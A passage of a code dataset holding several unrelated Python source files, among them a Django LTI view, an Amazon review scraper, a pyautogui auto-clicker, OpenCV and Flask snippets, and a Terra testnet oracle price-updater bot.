is_launch:\n # request.session['is_launch'] = 0\n #\n # context_vars['is_lti_launch'] = 1\n # context_vars['lti_session_key'] = lti_session_key\n #\n # # response = render_to_response('launcher.html',\n # # context_vars,\n # # context_instance=RequestContext(request),\n # # )\n # # set_response_meta_nocache(response)\n #\n # return redirect(\"/main/?lk=\" + lti_session_key)\n\n if not lti_session_key:\n context_vars['err_title'] = 'Invalid session.'\n context_vars['err_message'] = 'No session data found. 
Please relaunch application from Canvas.'\n response = render_to_response('lobby/lti_error.html',\n context_vars,\n context_instance=RequestContext(request),\n )\n set_response_meta_nocache(response)\n return response\n\n lti_session_data = request.session.get(lti_session_key)\n\n roles = lti_session_data.get('roles', None)\n user_role_list = get_user_role_list(roles)\n\n if is_valid_role(lti_session_data,\n user_role_list,\n ['admin', 'instructor', 'ta']):\n\n entry_url = \"/admin/?lk={0}\".format(lti_session_key)\n\n rr = redirect(entry_url)\n return rr\n\n elif is_valid_role(lti_session_data,\n user_role_list=user_role_list,\n role_verify_list=['student']):\n\n entry_url = \"/view/?lk={0}\".format(lti_session_key)\n\n rr = redirect(entry_url)\n return rr\n\n else:\n\n context_vars['err_title'] = 'Unauthorized.'\n context_vars['err_message'] = 'You are not authorized to access this application.'\n\n response = render_to_response('lobby/lti_error.html',\n context_vars,\n context_instance=RequestContext(request))\n set_response_meta_nocache(response)\n return response\n\ndef logout(request):\n\n context_vars = {}\n\n lti_session_key = request.session['lti_session_key']\n\n request.session['lti_session_key'] = None\n request.session[lti_session_key] = None\n\n response = render_to_response('lobby/lti_session_end.html',\n context_vars,\n context_instance=RequestContext(request),\n )\n set_response_meta_nocache(response)\n return response\n\n","repo_name":"nanosourcer/nanosourcer-lti","sub_path":"django_nanosourcer/views/v_main.py","file_name":"v_main.py","file_ext":"py","file_size_in_byte":6114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"12168336887","text":"#!/usr/bin/env python\nfrom os import popen\nimport _thread\n\"\"\"get option from device input\"\"\"\n\"\"\"\n\t1.get shell pip(command \"getevent\")\n\t2.read pip output info(read event4)\n\t3.deal info (change hex to oct)\n\t4.save info\n\"\"\"\ndef getInputCommand(shell_stream):\t\n\tcommand = input(\">>>\")\n\tshell_stream.write(\"input text %s\"%command)\n\nwith popen(r\"adb shell\",\"w\") as shell_stream:\n\tstrs = \"string\"\n\ttry:\n\t\tshell_stream.write(\"input text %s\" % strs)\n\t\t# _thread.start_new_thread(getInputCommand, (shell_stream,))\n\texcept Exception as e:\n\t\traise e\n\t# while True:\n\t# \tprint(shell_stream.read())\n\n\"\"\"\nwith popen(r\"adb shell getevent\",\"r\") as shell_stream:\n\twhile True:\n\t\tinfo = shell_stream.read()\n\t\tprint(info)\n\"\"\"","repo_name":"bread-kun/personal_py_pro","sub_path":"任务/记录操作/readOption.py","file_name":"readOption.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5823326443","text":"from selenium.webdriver.support.wait import WebDriverWait\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom bs4 import BeautifulSoup\nfrom time import sleep\nfrom data.model.review_model import Review\nfrom service.review_service import ReviewService\n\nclass AmzReviewScrapper ():\n target_url: str = ''\n page: int = 1\n max_page: int = 11\n que: list = []\n\n def __init__(self, target_url: str) -> None:\n self.target_url = target_url\n self.driver = webdriver.Chrome()\n self.wait = WebDriverWait(self.driver, 10)\n\n\n def wait_until_visible(self, xpath):\n return self.wait.until(EC.visibility_of_element_located((By.XPATH, 
xpath)))\n\n\n def find_by_xpath(self, xpath):\n try:\n return self.driver.find_element(By.XPATH, xpath)\n except:\n return None\n \n\n def get_html_from_target(self, target):\n return BeautifulSoup(target.get_attribute('outerHTML'), 'html.parser')\n\n\n def open_browser(self):\n self.driver.get('https://www.amazon.com/')\n sleep(2)\n self.driver.get(self.target_url)\n self.wait_until_visible('//*[@id=\"cm_cr-review_list\"]')\n\n\n def get_list_container(self):\n sleep(2)\n return self.get_html_from_target(self.driver.find_element(By.XPATH, '//*[@id=\"cm_cr-review_list\"]'))\n \n\n def scrap_data(self):\n reviews = self.get_list_container().find_all(attrs={\"data-hook\" : 'review'})\n\n for r in reviews:\n id = r['id']\n title = r.find(attrs={'data-hook': 'review-title'}).find('span', class_='a-letter-space').find_next_sibling('span').get_text()\n rating = r.find(attrs={'data-hook': 'review-title'}).find('i').find('span').get_text()[0:3]\n country = r.find(attrs={'data-hook': 'review-date'}).get_text().split('Reviewed in the ')[-1].split('on')[0].strip()\n date = r.find(attrs={'data-hook': 'review-date'}).get_text().split(' on ')[-1]\n vp = r.find(attrs={'data-hook': 'avp-badge'}).get_text() == 'Verified Purchase' if True else False\n review = r.find(attrs={'data-hook' : 'review-body'}).get_text().strip()\n name = r.find(attrs={'data-hook': 'genome-widget'}).find('span', class_='a-profile-name').get_text().strip()\n\n images = []\n\n try:\n imgs = r.find_all('div', class_='review-image-container')\n if(len(imgs) > 0):\n for img in imgs:\n images.append(img.find('img')['src'])\n except Exception as e: \n print(e)\n images = []\n\n try:\n video = r.find('div', id=f'review-video-id-{id}')['data-video-url']\n except Exception as e: \n print(e)\n video = ''\n\n print(id)\n print(title)\n print(rating)\n print(country)\n print(date)\n print(vp)\n # print(review)\n print(images)\n print(video)\n print(name)\n\n review = Review(id=id, review=review, country=country, date=date, pictures=images, rating=rating, vp=vp, title=title, video=video, name=name)\n self.que.insert(0, review)\n\n\n sleep(2)\n self.page = self.page + 1\n\n if(self.page < self.max_page):\n next_page_btn = self.find_by_xpath('//*[@id=\"cm_cr-pagination_bar\"]/ul/li[2]/a')\n next_page_btn.click()\n sleep(1)\n\n self.scrap_data()\n else:\n return\n\n\n def start(self): \n review_service = ReviewService()\n self.open_browser()\n\n try:\n self.scrap_data()\n except Exception as e:\n print(f'scrap error {e}')\n review_service.insert_reviews(self.que)\n\n review_service.insert_reviews(self.que)","repo_name":"GCnomore/craig_scrap","sub_path":"scrapper/amz_review_scrapper.py","file_name":"amz_review_scrapper.py","file_ext":"py","file_size_in_byte":3742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16659281130","text":"class ExceptionMessage:\n\t\"\"\"The exception message object to be passed to another process\n\t\"\"\"\n\n\tdef __init__(self, process_name, exc_msg):\n\t\tself.process_name = process_name\n\t\tself.exc_msg = exc_msg\n\ndef trim_callstack(exception_msg: str, target_user_file: str):\n\t\"\"\"\n\tShorten the call stack to the starting point of the user script\n\t\"\"\"\n\texception_msg_list = exception_msg.splitlines(keepends = True)\n\t# Store title\n\ttrimmed_msg = exception_msg_list[0]\n\n\t# Find the starting point\n\ti = 0\n\tfor i in range(2, len(exception_msg_list)):\n\t\tif target_user_file in exception_msg_list[i]:\n\t\t\tbreak\n\n\treturn trimmed_msg 
+ \"\".join(exception_msg_list[i:])\n","repo_name":"iYunghui/MLGame-Pingpong","sub_path":"essential/exception.py","file_name":"exception.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72109773233","text":"import pyautogui\nimport time\nimport xlrd\nimport pyperclip\n\nimg2 = r\"pic/Screenshot 2022-09-06 183945.png\"\nimg1 = r\"pic/Screenshot 2022-09-06 183537.png\"\nclickTimes = 1\nlOrR = 'left'\nlocation = pyautogui.locateCenterOnScreen(img2, confidence=0.9)\npyautogui.click(location.x, location.y, clicks=clickTimes, interval=0.2, duration=0.2, button=lOrR)\nwhile True:\n location = pyautogui.locateCenterOnScreen(img1, confidence=0.8)\n if location is not None:\n pyautogui.click(location.x, location.y, clicks=clickTimes, interval=0.2, duration=0.2, button=lOrR)\n else:\n pyautogui.moveTo(1000, 1000)\n pyautogui.scroll(-500)\n","repo_name":"Yeqi-Fang/Spyder","sub_path":"spyder_files/点赞.py","file_name":"点赞.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"31107658558","text":"import cv2.cv as cv\n\nim = cv.LoadImage(\"../img/lena.jpg\", cv.CV_8U)\n\ncv.SetImageROI(im, (1, 1,30,30))\n\nhistsize = 256 #Because we are working on grayscale pictures\nhist = cv.CreateHist([histsize], cv.CV_HIST_ARRAY, [[0,histsize]], 1)\ncv.CalcHist([im], hist)\n\n\ncv.NormalizeHist(hist,1) # The factor rescale values by multiplying values by the factor\n_,max_value,_,_ = cv.GetMinMaxHistValue(hist)\n\nif max_value == 0:\n max_value = 1.0\ncv.NormalizeHist(hist,256/max_value)\n\ncv.ResetImageROI(im)\n\nres = cv.CreateMat(im.height, im.width, cv.CV_8U)\ncv.CalcBackProject([im], res, hist)\n\ncv.Rectangle(im, (1,1), (30,30), (0,0,255), 2, cv.CV_FILLED)\ncv.ShowImage(\"Original Image\", im)\ncv.ShowImage(\"BackProjected\", res)\n#--------------------------------------------------------\n\n\n'''\n# For colored pictures !\nim = cv.LoadImage(\"../img/lena.jpg\")\n\nr = cv.CreateImage(cv.GetSize(im), 8, cv.CV_8UC1)\ng = cv.CreateImage(cv.GetSize(im), 8, cv.CV_8UC1)\nb = cv.CreateImage(cv.GetSize(im), 8, cv.CV_8UC1)\ncv.Split(im, r, g, b, None)\n\ncv.SetImageROI(r, (1, 1,30,30))\ncv.SetImageROI(g, (1, 1,30,30))\ncv.SetImageROI(b, (1, 1,30,30))\nplanes = [r,g,b]\n\nhistsize = [256,256,256]\n\nhist = cv.CreateHist(histsize, cv.CV_HIST_ARRAY, [[0,256],[0,256],[0,256]], 1)\ncv.CalcHist([cv.GetImage(i) for i in planes], hist)\n\ncv.NormalizeHist(hist,1)\n_,max_value,_,_ = cv.GetMinMaxHistValue(hist)\n\nif max_value == 0:\n max_value = 1.0\n \ncv.NormalizeHist(hist,1/max_value)\n\ncv.ResetImageROI(r)\ncv.ResetImageROI(g)\ncv.ResetImageROI(b)\n\n\nres = cv.CreateImage((im.width,im.height), 8, 3)\ncv.CalcBackProject([r,g,b], res, hist)\n\nthresh = cv.CloneImage(res)\ncv.Threshold(thresh, thresh, 1.0, 256, cv.CV_THRESH_BINARY)\n\n\ncv.Rectangle(im, (1,1), (30,30), (0,0,255), 2, cv.CV_FILLED)\ncv.ShowImage(\"Original Image\", im)\ncv.ShowImage(\"Threshed\", thresh)\ncv.ShowImage(\"BackProjected\", res)\n'''\n\ncv.WaitKey(0)","repo_name":"RobinDavid/OpenCV-tutorials","sub_path":"image/4b-backprojecting.py","file_name":"4b-backprojecting.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"39"} +{"seq_id":"26227632652","text":"n=int(input(\"Enter a number to wheather it is palindrome or not :\"))\ntemp=n\nd=0\nwhile n!=0:\n r=n%10\n 
d=d*10+r\n n=n//10\nprint(d) \nif temp==d:\n print(\"Number is a palindrome\")\nelse:\n print(\"Number is not a palindrome\")\ninput()\n","repo_name":"praveenchandra01/Python","sub_path":"Basic Python Programs/Palindrome.py","file_name":"Palindrome.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"14968852918","text":"import os\n\nfrom gitflow import _, repotools\nfrom gitflow.common import Result\nfrom gitflow.context import Context\nfrom gitflow.procedures.common import get_branch_by_branch_name_or_version_tag, get_command_context, check_in_repo\nfrom gitflow.repotools import BranchSelection\n\n\ndef call(context: Context) -> Result:\n command_context = get_command_context(\n context=context,\n object_arg=context.args['<object>']\n )\n\n check_in_repo(command_context)\n\n object_arg = context.args['<object>']\n args = context.args['<git-arg>']\n\n if object_arg is not None:\n selected_branch = get_branch_by_branch_name_or_version_tag(context, object_arg,\n BranchSelection.BRANCH_PREFER_LOCAL)\n if selected_branch is None:\n command_context.fail(os.EX_USAGE,\n _(\"Log failed.\"),\n _(\"Failed to resolve an object for token {object}.\")\n .format(object=repr(object_arg))\n )\n else:\n selected_branch = None\n\n log_command = ['log']\n if context.pretty:\n log_command.append('--pretty')\n if context.dry_run:\n log_command.append('--dry-run')\n if context.verbose:\n log_command.append('--verbose')\n if selected_branch is not None:\n log_command.append(selected_branch)\n\n proc = repotools.git_interactive(context.repo, *(log_command + args))\n proc.wait()\n\n return context.result\n","repo_name":"abacusresearch/gitflow","sub_path":"gitflow/procedures/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"588497580","text":"\"\"\"\nAut: Sidratul MT\nALG: Bubble sort\nComp: O(n^2)\nDate: 16.Aug.2020\nTime: 13:00\nDone\"\"\"\n\nar = [2, 4, 1, 6, 3, 6, 3, 9, 2, 12, 4, 12, 78 ,34 ,43, 33, 0]\nfor i in range(len(ar)):\n for j in range(len(ar)-1):\n if ar[j] > ar[j+1]:\n a = ar[j+1]\n ar[j+1] = ar[j]\n ar[j] = a\n print(ar[j+1], ar[j])\n\nprint(ar)\n","repo_name":"sidratul-muntaher/Algorithms","sub_path":"Sort/buble.py","file_name":"buble.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"35418754864","text":"\"\"\"Preparation for runners\"\"\"\nfrom __future__ import annotations\n\nimport os\nfrom datetime import datetime, timezone\nfrom pathlib import Path\nfrom shutil import rmtree\nfrom tempfile import mkdtemp\nfrom typing import TYPE_CHECKING\n\nfrom monty.shutil import copy_r, gzip_dir\n\nfrom quacc import SETTINGS\nfrom quacc.atoms.core import copy_atoms\nfrom quacc.utils.files import copy_decompress, make_unique_dir\n\nif TYPE_CHECKING:\n from ase import Atoms\n\n\ndef calc_setup(\n atoms: Atoms, copy_files: list[str | Path] | None = None\n) -> tuple[Atoms, Path, Path]:\n \"\"\"\n Perform staging operations for a calculation, including copying files to the scratch\n directory, setting the calculator's directory, decompressing files, and creating a\n symlink to the scratch directory.\n\n Parameters\n ----------\n atoms\n The Atoms object to run the calculation on.\n copy_files\n Filenames to copy from source to scratch directory.\n\n Returns\n -------\n Atoms\n The input Atoms object.\n Path\n
The path to the tmpdir, where the calculation will be run. It will be\n deleted after the calculation is complete.\n Path\n The path to the results_dir, where the files will ultimately be stored.\n A symlink to the tmpdir will be made here during the calculation for\n convenience.\n \"\"\"\n\n # Don't modify the original atoms object\n atoms = copy_atoms(atoms)\n\n # Set where to store the results\n job_results_dir = (\n make_unique_dir(base_path=SETTINGS.RESULTS_DIR)\n if SETTINGS.CREATE_UNIQUE_WORKDIR\n else SETTINGS.RESULTS_DIR\n )\n\n # Create a tmpdir for the calculation within the scratch_dir\n time_now = datetime.now(timezone.utc).strftime(\"%Y-%m-%d-%H-%M-%S-%f\")\n tmpdir = Path(\n mkdtemp(prefix=f\"quacc-tmp-{time_now}-\", dir=SETTINGS.SCRATCH_DIR)\n ).resolve()\n\n # Create a symlink to the tmpdir in the results_dir\n if os.name != \"nt\" and SETTINGS.SCRATCH_DIR != SETTINGS.RESULTS_DIR:\n symlink = job_results_dir / f\"{tmpdir.name}-symlink\"\n symlink.unlink(missing_ok=True)\n symlink.symlink_to(tmpdir, target_is_directory=True)\n\n # Copy files to tmpdir and decompress them if needed\n if copy_files:\n copy_decompress(copy_files, tmpdir)\n\n os.chdir(tmpdir)\n\n return atoms, tmpdir, job_results_dir\n\n\ndef calc_cleanup(tmpdir: str | Path, job_results_dir: str | Path) -> None:\n \"\"\"\n Perform cleanup operations for a calculation, including gzipping files, copying\n files back to the original directory, and removing the tmpdir.\n\n Parameters\n ----------\n tmpdir\n The path to the tmpdir, where the calculation will be run. It will be\n deleted after the calculation is complete.\n job_results_dir\n The path to the job_results_dir, where the files will ultimately be\n stored. A symlink to the tmpdir will be made here during the calculation\n for convenience.\n\n Returns\n -------\n None\n \"\"\"\n\n # Change to the results directory\n os.chdir(job_results_dir)\n\n # Gzip files in tmpdir\n if SETTINGS.GZIP_FILES:\n gzip_dir(tmpdir)\n\n # Copy files back to job_results_dir\n copy_r(tmpdir, job_results_dir)\n\n # Remove symlink to tmpdir\n symlink_path = job_results_dir / f\"{tmpdir.name}-symlink\"\n symlink_path.unlink(missing_ok=True)\n\n # Remove the tmpdir\n rmtree(tmpdir, ignore_errors=True)\n","repo_name":"arosen93/quacc","sub_path":"src/quacc/runners/prep.py","file_name":"prep.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"39"} +{"seq_id":"33036641415","text":"from ..bot.Bot import Bot\nfrom ..bot.Oracle import Oracle\nfrom ..bot.Mint import Mint \n\nfrom terra_sdk.client.lcd import LCDClient\nfrom dotenv import load_dotenv\nimport os, sys, time\n\nload_dotenv() \nnetwork = \"testnet\"\nORACLE_CONTRACT_ADDR = os.getenv('ORACLE_CONTRACT_ADDR')\nSCA_CONTRACT_ADDR = os.getenv('SCA_CONTRACT_ADDR')\nMINT_CONTRACT_ADDR = os.getenv('MINT_CONTRACT_ADDR')\n\ndeployer_key = os.environ.get(\"MNEMONIC_KEY\")\n\nbot = Bot(network, deployer_key)\ndeployer = bot.get_deployer()\nprint(deployer.key.acc_address)\n\noracle = Oracle(network, deployer_key, None, ORACLE_CONTRACT_ADDR)\nmint = Mint(network, deployer_key, None, MINT_CONTRACT_ADDR)\n\n\nprices = [250, 172, 163, 185, 190]\nmultiplier = 1000000\n\ni = 0\n\n\nrandom = False \nmax_range = 0.5\nwhile True:\n cprice = prices[i] * multiplier; \n oracle.set_price(deployer, SCA_CONTRACT_ADDR, str(cprice))\n mint.mass_update(deployer) \n\n i+= 1\n if i == len(prices):\n i = 0\n\n 
time.sleep(5)","repo_name":"1CentLab/Synthetic-Crypto-Assets-Contract","sub_path":"scripts/worker/update_price.py","file_name":"update_price.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"41017831151","text":"\ndef isPrime(n):\n if n<2:\n return False\n else:\n for i in range(2,n):\n if n%i == 0:\n return False\n return True\n\ndef main():\n n = 10\n answer = []\n for i in range(1,n+1):\n if(isPrime(i)):\n answer.append(i)\n print(answer)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"tae2089/algorithm","sub_path":"python/etc/find_prime_numbers.py","file_name":"find_prime_numbers.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71244018673","text":"import numpy\n\nPARAMETERS_NUMBER = 3\nINPUTS_NUMBER = 3\nSAMPLES_NUMBER = 200\n\nclass SystemLinearizer:\n samplesCount = 0\n\n def __init__( self ):\n self.statesList = numpy.zeros( ( SAMPLES_NUMBER, PARAMETERS_NUMBER ) )\n self.inputsList = numpy.zeros( ( SAMPLES_NUMBER, INPUTS_NUMBER ) )\n \n def AddSample( self, position, velocity, acceleration, inputForce, outputForce ):\n sampleIndex = self.samplesCount % SAMPLES_NUMBER\n self.statesList[ sampleIndex ][ 0 ] = acceleration\n self.statesList[ sampleIndex ][ 1 ] = velocity\n self.statesList[ sampleIndex ][ 2 ] = position\n self.inputsList[ sampleIndex ][ 0 ] = inputForce\n self.inputsList[ sampleIndex ][ 1 ] = outputForce\n self.inputsList[ sampleIndex ][ 2 ] = inputForce + outputForce\n self.samplesCount += 1\n \n def IdentifySystem( self, defaultImpedance ):\n inputImpedance = defaultImpedance\n outputImpedance = defaultImpedance\n plantImpedance = defaultImpedance\n if self.samplesCount >= SAMPLES_NUMBER:\n parameters, residuals, rank, s = numpy.linalg.lstsq( self.statesList, self.inputsList, rcond=None )\n inputImpedance = numpy.maximum( ( parameters[ 0 ][ 0 ], parameters[ 1 ][ 0 ], parameters[ 2 ][ 0 ] ), ( 0.0, 0.0, 0.0 ) )\n outputImpedance = numpy.maximum( ( parameters[ 0 ][ 1 ], parameters[ 1 ][ 1 ], parameters[ 2 ][ 1 ] ), ( 0.0, 0.0, 0.0 ) )\n plantImpedance = numpy.maximum( ( parameters[ 0 ][ 2 ], parameters[ 1 ][ 2 ], parameters[ 2 ][ 2 ] ), ( 0.0, 0.0, 0.0 ) )\n \n return ( inputImpedance, outputImpedance, plantImpedance )\n","repo_name":"EESC-MKGroup/OSim-Telerehab-Simulator","sub_path":"system_linearizer.py","file_name":"system_linearizer.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"17099392027","text":"import numpy as np\nimport nltk\nfrom nltk.util import ngrams\nfrom collections import Counter\nfrom stanfordcorenlp import StanfordCoreNLP\nimport spacy\nimport json\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n\n\nSTANFORD_MODEL_PATH = 'models/stanford-corenlp-full-2016-10-31'\nSPACY_MODEL = 'en_core_web_md'\n\n\nSENTENCES = \"sentences\"\nSENTIMENT = \"sentiment\"\nSENTIMENT_VALUE = \"sentimentValue\"\nSENTIMENT_ANNOTATOR = {'annotators':'sentiment', 'pipelineLanguage':'en', 'outputFormat':'json'}\nSENTIMENT_INDEX = {\"Positive\": 0,\n \"Neutral\": 1,\n \"Negative\": 2,\n \"Verynegative\":3}\n\n\nNGRAM_SIZE = 100\n\nMAX_DF = 0.8\nMIN_DF = 5\nMAX_FEATURES = 2000\n\nclass Features:\n def __init__(self):\n self.stanford_nlp = StanfordCoreNLP(STANFORD_MODEL_PATH)\n self.spacy_nlp = spacy.load(SPACY_MODEL)\n self.tfidf = 
TfidfVectorizer(min_df = MIN_DF,\n max_df = MAX_DF,\n max_features = MAX_FEATURES,\n stop_words = 'english',\n norm = 'l2'\n )\n\n def get_features(self, t, is_train):\n doc_vocab_mat,lookup = self._get_tfidf(t, is_train)\n bigram_counts = self._get_ngram_counts(t, 2)\n trigram_counts = self._get_ngram_counts(t, 3)\n\n sentiments = self._get_sentiment(t)\n sent_len = self._get_average_sent_length(t)\n vector = np.hstack((doc_vocab_mat, bigram_counts, trigram_counts, sentiments, sent_len))\n return vector.astype(np.float32), lookup\n\n def _get_tfidf(self, lines, is_train):\n if is_train:\n doc_vocab_mat = self.tfidf.fit_transform(lines).toarray()\n else:\n doc_vocab_mat = self.tfidf.transform(lines).toarray()\n lookup = {i:v for i, v in enumerate(self.tfidf.get_feature_names())}\n return doc_vocab_mat, lookup\n\n def _get_average_sent_length(self, t):\n result = np.zeros((len(t),1))\n for i,doc in enumerate(t):\n sents = nltk.sent_tokenize(doc)\n length = 0\n for sent in sents:\n words = nltk.word_tokenize(sent)\n length += len(words)\n sen_len = length/len(sents)\n result[i] = np.clip(sen_len/25, 0,1)\n return result\n\n def _get_ngram_counts(self, t, n=2):\n tokens = [nltk.word_tokenize(doc) for doc in t]\n flattened = [item for sublist in tokens for item in sublist]\n n_grams = Counter(ngrams(flattened, n)).most_common(NGRAM_SIZE)\n result = np.zeros((len(t), NGRAM_SIZE))\n for i,doc in enumerate(tokens):\n ngram = Counter(ngrams(doc, n))\n for j,key in enumerate(n_grams):\n count = ngram.get(key,0)\n result[i,j]=count\n return result\n\n def _get_sentiment(self, t):\n sentiments = np.zeros((len(t), len(SENTIMENT_INDEX)))\n for i, doc in enumerate(t):\n tagged = self.stanford_nlp.annotate(doc, properties = SENTIMENT_ANNOTATOR)\n try:\n sentences = json.loads(tagged)[SENTENCES]\n sents = np.zeros(len(SENTIMENT_INDEX))\n for sent in sentences:\n sentimentValue = int(sent[SENTIMENT_VALUE])\n sentiment = sent[SENTIMENT]\n ind = SENTIMENT_INDEX[sentiment]\n sents[ind] += sentimentValue\n sentiments[i] = sents/len(sentences)\n except Exception as e:\n print(i, tagged)\n return sentiments","repo_name":"YuntianLan/Who-are-you-on-screen","sub_path":"app/mlsystem/feature_extraction.py","file_name":"feature_extraction.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"39"} +{"seq_id":"16716551225","text":"from flask import Flask, send_from_directory, jsonify\nimport os\nimport random\napp = Flask(__name__)\n\n# Change this to the path of your directory containing images\nIMAGE_FOLDER = \"./imgs\"\n\n@app.route('/images', methods=['GET'])\ndef serve_random_image():\n \"\"\"Serve a random image from the IMAGE_FOLDER.\"\"\"\n files = os.listdir(IMAGE_FOLDER)\n images = [f for f in files if f.endswith(('jpeg', 'png', 'jpg', 'gif'))]\n if not images:\n return \"No images found\", 404\n selected_image = random.choice(images)\n return send_from_directory(IMAGE_FOLDER, selected_image)\n\n@app.route('/images/', methods=['GET'])\ndef serve_image(filename):\n \"\"\"Serve an image from the IMAGE_FOLDER.\"\"\"\n return send_from_directory(IMAGE_FOLDER, filename)\n\nif __name__ == '__main__':\n app.run(port=5001)\n","repo_name":"megamen32/FootballTracker","sub_path":"data_server/data_server.py","file_name":"data_server.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"20891988120","text":"import remotefile\r\nimport 
threading\r\nimport abc\r\nimport sys\r\n\r\nclass NodeDataHandler(metaclass=abc.ABCMeta):\r\n @abc.abstractmethod\r\n def inPortDataWriteNotify(self, file, write_offset : int, write_len : int):\r\n \"\"\"\r\n Notification called when inPortDataFile has been written to (from ApxFileManager)\r\n \"\"\"\r\n @abc.abstractmethod\r\n def inPortDataOpen(self, file):\r\n \"\"\"\r\n Called when APX server has requested to open the nodes input file\r\n \"\"\"\r\n\r\n\r\nclass File(remotefile.File):\r\n \"\"\"\r\n This is the apx.File class. It inherits from remotefile.File.\r\n \r\n In the C implementation this type is called apx_file_t.\r\n \"\"\"\r\n def __init__(self, name, length, init_data=None):\r\n super().__init__(name, length)\r\n self.data = bytearray(length)\r\n self.dataLock = threading.Lock()\r\n self.fileManager = None\r\n if init_data is not None:\r\n if len(init_data) != length:\r\n raise ValueError('Length of init_data must be equal to length argument') \r\n self.data[0:length]=init_data\r\n\r\n def read(self, offset: int, length: int):\r\n \"\"\"\r\n reads data from the given offset, returns a bytes object or None in case of error\r\n \"\"\"\r\n if(offset < 0) or (offset+length>len(self.data) ):\r\n print('file read outside file boundary detected, file=%s, off=%d, len=%d'%(self.name, offset, len(self.data)),file=sys.stderr)\r\n return None\r\n self.dataLock.acquire()\r\n retval = bytes(self.data[offset:offset+length])\r\n self.dataLock.release()\r\n return retval\r\n \r\n \r\n def write(self, offset: int, data: bytes):\r\n \"\"\"\r\n writes data at the given offset in the file\r\n returns number of bytes written or -1 on error\r\n \"\"\"\r\n if(offset < 0) or (offset+len(data)>len(self.data) ):\r\n print('file write outside file boundary detected, file=%s, off=%d, len=%d'%(self.name, offset, len(data)),file=sys.stderr)\r\n return -1\r\n self.dataLock.acquire()\r\n self.data[offset:offset+len(data)]=data\r\n self.dataLock.release()\r\n return len(data)\r\n \r\n\r\nclass InputFile(File):\r\n \"\"\"\r\n An APX input file. When written to, it notifies the upper layer (NodeDataHandler) about the change\r\n \"\"\"\r\n def __init__(self, name, length, init_data=None):\r\n super().__init__(name, length, init_data)\r\n self.nodeDataHandler=None\r\n \r\n def write(self, offset: int, data: bytes, more_bit : bool = False):\r\n retval = super().write(offset, data) \r\n if (retval >= 0) and not more_bit:\r\n if self.nodeDataHandler is not None:\r\n self.nodeDataHandler.inPortDataWriteNotify(self, offset, len(data))\r\n return retval\r\n \r\n\r\nclass OutputFile(File):\r\n \"\"\"\r\n An APX output file. 
When written to, it notifies the lower layer (FileManager) about the change\r\n \"\"\"\r\n def __init__(self, name, length, init_data=None):\r\n super().__init__(name, length, init_data)\r\n \r\n def write(self, offset: int, data: bytes):\r\n retval = super().write(offset, data)\r\n if (retval >= 0) and (self.fileManager is not None) and self.isOpen:\r\n self.fileManager.outPortDataWriteNotify(self, offset, len(data))\r\n return retval\r\n ","repo_name":"cogu/py-apx","sub_path":"apx/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"6547544227","text":"''' Built-in functions\nstr converts the variable to a string\nint converts the variable to an integer\nfloat converts the variable to a float\nbin converts to binary\nhex converts to hexadecimal\nround rounds a number\nlen counts the characters of a string\n\n'''\n\nn = str(10)\nn = int(\"10\")\nn = float(\"10.3\")\nn = bin(10)\nn = int('0b1010',2) # converts from binary to integer (base 2)\nn = int('0xa', 16) # converts from hexadecimal to integer (base 16)\n\n\nprint(n)\n\n\n\n","repo_name":"mastrangeloispc/ejerciciosPyhton","sub_path":"funciones integradas.py","file_name":"funciones integradas.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"43525908985","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 28 13:11:25 2017\r\n\r\n@author: Elham\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom scipy.spatial import distance\r\n\r\n\r\ndef ClC(m,X): \r\n \r\n X = X[:, 3:, :]\r\n \r\n m = m[:, 3:, :]\r\n \r\n dmin = np.zeros( [np.shape(X)[0], 1, np.shape(X)[2]] )\r\n ind = np.zeros( [np.shape(X)[0], 1, np.shape(X)[2]] )\r\n \r\n \r\n # Calculate Distance Matrix \r\n for q in range ( np.shape(X)[2] ):\r\n \r\n d = distance.cdist(X[:,:,q], m[:,:,q], 'euclidean')\r\n \r\n # Assign Clusters and Find Closest Distances\r\n dmin[:,0,q], ind[:,0,q] = 